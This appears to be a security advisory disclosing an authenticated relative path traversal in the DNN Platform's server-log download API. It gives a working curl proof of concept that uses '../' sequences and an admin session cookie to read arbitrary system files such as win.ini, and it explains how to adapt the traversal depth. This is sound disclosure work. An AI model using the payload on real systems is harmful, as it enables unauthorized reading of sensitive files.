Path traversal on administrative account in dnnsoftware/dnn.platform
Aug 9th 2022
Relative path traversal in DNN.Platform at log download functionality. Administrative account can download any system file. This could allow direct read access to files that are not meant to be accessible directly by the platform.
Proof of Concept
Login as administrative user. Payload tested on DNN 9.1.1
curl -i -s -k -X $'GET' \ -H $'Host: <HOST>' \ -b $'.DOTNETNUKE=<ADMIN_SESSION>' \ $'https://<HOST>/<PATH_TO_DNN>/API/PersonaBar/ServerSettingsLogs/GetLogFile?fileName=../../../../../../Windows/win.ini'
Replace the <HOST>, <ADMIN_SESSION> and <PATH_TO_DNN> with the appropriate values. <PATH_TO_DNN> may include the language selection. Other files than Windows/win.ini may be leaked, such as windows/system32/drivers/etc/hosts. Adjust the number of "../" depending on the local configuration.
Arbitrary file read. This could leak sensitive system files or any file present on the system.